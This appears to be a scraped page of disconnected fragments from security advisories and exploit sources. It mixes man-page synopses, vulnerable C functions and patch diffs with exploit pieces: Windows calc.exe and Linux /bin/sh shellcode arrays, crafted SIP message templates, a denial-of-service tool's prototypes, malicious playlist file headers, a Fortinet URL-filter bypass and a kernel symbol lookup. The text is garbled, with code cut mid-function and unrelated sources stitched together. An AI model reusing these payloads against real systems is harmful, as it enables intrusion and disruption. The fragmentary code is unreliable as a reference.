Next Page >>
char
void split_redraw(void)
{
int max;
int at;
ip_t *addr;
char *name;
char newLine[MAX_LINE_SIZE];
int i;
...
if ( $expired < time() )
return false;
...
// A mysterious hash is used here, the hash becomes a seven
// character word generated by wp_generate_password()
// (a.k.a. SECRET_SALT), note that wp_salt() sets
// $secret_key to null if SECRET_KEY is equal to the default value.
.
// The argument passed to wp_hash() in the next line is
// completely poisonable.
- --- 0.Description ---
SYNOPSIS
#include <floatingpoint.h>
char *econvert(double value, int ndigit, int *decpt, int
*sign, char *buf);
char *fconvert(double value, int ndigit, int *decpt, int
*sign, char *buf);
};
+/* This is at least as big as the largest size of an integer that
+ encode_int can generate; it is sufficient for creating buffers for
+ it to write into. This assumes that integers are at most 64 bits,
+ and so 10 bytes (with 7 bits of information each) are sufficient to
+ represent them. */
+#define MAX_ENCODED_INT_LEN 10
+/* This is at least as big as the largest size for a single instruction. */
+#define MAX_INSTRUCTION_LEN (2*MAX_ENCODED_INT_LEN+1)
+/* This is at least as big as the largest possible instructions
In Microsoft Virtual PC and Windows Virtual PC, the Virtual Machine
Monitor (VMM) is responsible for mediating access to hardware resources
and devices from operating systems running in a virtualized environment.
The transparency and efficiency of this mediation layer is one of the
core characteristics of modern virtualization technologies. In this
context, to maintain an equivalent level of risk for the same
application independently of whether it is running on a virtualized or a
non-virtualized environment, the OS hardening and anti-exploitation
mechanisms of a Windows operating system running directly on hardware
should have the exact same effectiveness and efficiency when the OS runs
/-----------
Xml2thot.c
3247 static void EndOfXmlAttributeValue (char *attrValue)
3248
3249 {
3250 AttributeType attrType;
3251 int attrKind, val;
3252 unsigned char msgBuffer[MaxMsgLength];
Vendor: http://www.php.net
- --- 0.Description ---
strfmon -- convert monetary value to string
The strfmon() function places characters into the array pointed to by s as controlled by the string pointed to by format. No more than maxsize bytes are placed into the array.
The format string is composed of zero or more directives: ordinary characters (not %), which are copied unchanged to the output stream; and conversion specifications, each of which results in fetching zero or more subsequent arguments. Each conversion specification is introduced by the % character.
SYNOPSIS:
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
int socket_connect(char *server, int port) {
int fd;
struct sockaddr_in sock;
struct hostent *host;
#define closesocket close
#define SOCKET int
#define DWORD unsigned long
#endif
char *craft_pkt =
"MESSAGE sip:[FROMUSER]@[DOMAIN] SIP/2.0\r\n"
"Via: SIP/2.0/UDP [FROMADDR]:[LOCALPORT];branch=[BRANCH]\r\n"
"From: [FROMUSER] <sip:[FROMADDR]:[LOCALPORT]>;tag=[TAG]\r\n"
"To: <sip:[TOADDR]>\r\n"
"Call-ID: [CALLID]@[DOMAIN]\r\n"
#define closesocket close
#define SOCKET int
#define DWORD unsigned long
#endif
char *craft_pkt[] =
{
"MESSAGE sip:[FROMUSER]@[DOMAIN] SIP/2.0\r\n"
"Via: SIP/2.0/UDP [FROMADDR]:[LOCALPORT];branch=[BRANCH]\r\n"
"From: [FROMUSER] <sip:[FROMADDR]:[LOCALPORT]>;tag=[TAG]\r\n"
"To: <sip:[TOADDR]>\r\n"
--- 1.Description ---
libzip allows remote and local attackers to Denial of Service (Null Pointer Dereference) if ZIP_FL_UNCHANGED flag is set.
-lib/zip_name_locate.c---
int
_zip_name_locate(struct zip *za, const char *fname, int flags,
struct zip_error *error)
{
int (*cmp)(const char *, const char *);
const char *fn, *p;
int i, n;
lib/http.c
...
extract_header_value(header, info->http_location, "Location:");
...
int extract_header_value (char *header, char *dest, char *match)
{
char* start = (char *)strstr(header, match);
if (start) {
subnstr_until(start+strlen(match), "\n", dest, MAX_ICY_STRING);
return 1;
/* Function prototypes */
int open_socket (void);
int close_socket (int);
int send_dos(int, unsigned long, unsigned long, unsigned long);
unsigned long resolve_ip (char *);
unsigned long get_int_ipv4 (char *);
/* Globals */
int sockfd;
int nhrp_req_id;
/* opcode: 0x01, address: 0x004922F0 (address from 2007
ProPremier)*/
long sub_4922F0 (
[in] long arg_1,
[in][size_is(arg_1)] char * arg_2,
[in] hyper arg_3
);
Exploitation:
SYNOPSIS
#include <fnmatch.h>
int
fnmatch(const char *pattern, const char *string, int flags);
--- 1. Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) ---
Attacker, what may modify first and second parameters(pattern,string) of fnmatch(3), may cause to CPU resource exhaustion. To see problem huge complexity, try compile code below:
#define MAX_LOGIN 16
#define MAX_GECOS 128
#define MAX_HOME 128
#define MAX_SHELL 128
static char itoa64[64] =
"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
static int debug = 0, relaxed = 0;
static char buf[SOCKET_BUF];
--- 0.Description ---
The getservbyname(), and getservbyport() functions each return a pointer to an object with the following structure containing the broken-out fields of a line in the network services data base,
struct servent *
getservbyname(const char *name, const char *proto);
struct servent *
getservbyport(int port, const char *proto);
The getservbyname() and getservbyport() functions sequentially search from the beginning of the file until a matching protocol name or port number is found, or until EOF is encountered. If a protocol name is also supplied (non-NULL), searches must also match the protocol.
#define OFFSET 4096
// calc (pour tester l'exploit)
char scode1[]=
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
"\x21\xdb\x5b\x83\xeb\xfc\xe2\xf4\x55\xc9\x9f\x5b\xa9\x21\x50\x1e"
"\x95\xaa\xa7\x5e\xd1\x20\x34\xd0\xe6\x39\x50\x04\x89\x20\x30\x12"
"\x22\x15\x50\x5a\x47\x10\x1b\xc2\x05\xa5\x1b\x2f\xae\xe0\x11\x56"
"\xa8\xe3\x30\xaf\x92\x75\xff\x5f\xdc\xc4\x50\x04\x8d\x20\x30\x3d"
/*
* those are the standard RFC 1321 test vectors
*/
static char *msg[] =
{
"",
"a",
"abc",
"message digest",
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 */
unsigned char CalcShellcode[] =
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26"
"\x45\x32\xe3\x83\xeb\xfc\xe2\xf4\xda\xad\x76\xe3\x26\x45\xb9\xa6"
"\x1a\xce\x4e\xe6\x5e\x44\xdd\x68\x69\x5d\xb9\xbc\x06\x44\xd9\xaa"
"\xad\x71\xb9\xe2\xc8\x74\xf2\x7a\x8a\xc1\xf2\x97\x21\x84\xf8\xee"
"\x27\x87\xd9\x17\x1d\x11\x16\xe7\x53\xa0\xb9\xbc\x02\x44\xd9\x85"
of 15 bytes called trash used as destination by sscanf without the
needed size limits.
From rtsp/RTSP_state_machine.c:
int RTSP_valid_response_msg(unsigned short *status, char *msg, RTSP_buffer * rtsp)
// This routine is from BP.
{
char ver[32], trash[15];
unsigned int stat;
unsigned int seq;
diff --git a/usr.sbin/ppp/systems.c b/usr.sbin/ppp/systems.c
index 77f06a1..0cf01d1 100644
--- a/usr.sbin/ppp/systems.c
+++ b/usr.sbin/ppp/systems.c
@@ -82,6 +82,10 @@ InterpretArg(const char *from, char *to)
from++;
while (*from != '\0') {
+ if (to >= endto) {
+ *endto = '\0';
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
fetchmail-SA-2010-02: Denial of service in debug mode w/ multichar locales
Topics: Denial of service in debug output
Author: Matthias Andree
Version: 1.0
Announced: 2010-05-06
Description:
"Fortinet's URL blocking functionality can be bypassed by
specially-crafted HTTP requests that fulfill 3 factors:
1.- HTTP Requests are terminated by the CRLF characters.
2.- Forcing to talk via HTTP/1.0 version so that dont send the host header.
3.- Finally, by Fragmenting the GET or POST requests
Analysis:
(gdb) x/x $eax
0x0: Cannot access memory at address 0x0
(gdb) x/x $edi
0x0: Cannot access memory at address 0x0
In this case, memset() overwrite the memory with 0x0 char. If attacker can put something else that 0x0, it would have security impact.
There are more interesting places, where user may try change size of malloc. See bellow
-id0-start---------
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/curl/interface.c?view=markup
*/
#include<stdio.h>
#include<string.h>
#include<windows.h>
char header1[]=
"\x3C\x61\x73\x78\x20\x76\x65\x72\x73\x69\x6F\x6E\x20\x3D\x20"
"\x22\x33\x2E\x30\x22\x20\x3E\x0D\x0D\x0A\x3C\x65\x6E\x74\x72"
"\x79\x3E\x0D\x0D\x0A\x3C\x74\x69\x74\x6C\x65\x3E\x61\x72\x63"
"\x68\x20\x65\x6E\x65\x6D\x79\x2D\x6E\x65\x6D\x73\x69\x73\x2E"
"\x6D\x70\x33\x3C\x2F\x74\x69\x74\x6C\x65\x3E\x0D\x0D\x0A\x3C"
*/
#include<stdio.h>
#include<string.h>
#include<windows.h>
// unicode format
char header1[]=
"\x3c\x77\x61\x78\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x22"
"\x33\x2e\x30\x22\x20\x3e\x0d\x0d\x0d\x3c\x65\x6e\x74\x72\x79\x3e"
"\x0d\x0d\x0d\x3c\x74\x69\x74\x6c\x65\x3e\x43\x6f\x64\x65\x64\x20"
"\x42\x79\x20\x53\x69\x6d\x4f\x2d\x73\x30\x66\x54\x2e\x6d\x70\x33"
"\x3c\x2f\x74\x69\x74\x6c\x65\x3e\x0d\x0d\x0d\x3c\x72\x65\x66\x20"
int main()
{
int i;
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
diff --git a/libcutils/strdup8to16.c b/libcutils/strdup8to16.c
index 8654b04..13a6430 100644
--- a/libcutils/strdup8to16.c
+++ b/libcutils/strdup8to16.c
@@ -49,6 +49,7 @@ extern char16_t * strdup8to16 (const char* s, size_t *out_len)
len = strlen8to16(s);
// no plus-one here. UTF-16 strings are not null terminated
+ /* Integer overflow here; pass 2.1GB string here and see .... */
ret = (char16_t *) malloc (sizeof(char16_t) * len);
> #define SHIFT 8
> #define OFFSET 1
> #endif
>
> /* thanks spender... */
> unsigned long get_kernel_sym(char *name)
> {
> FILE *f;
> unsigned long addr;
> char dummy;
> char sname[512];
Next Page>>
|
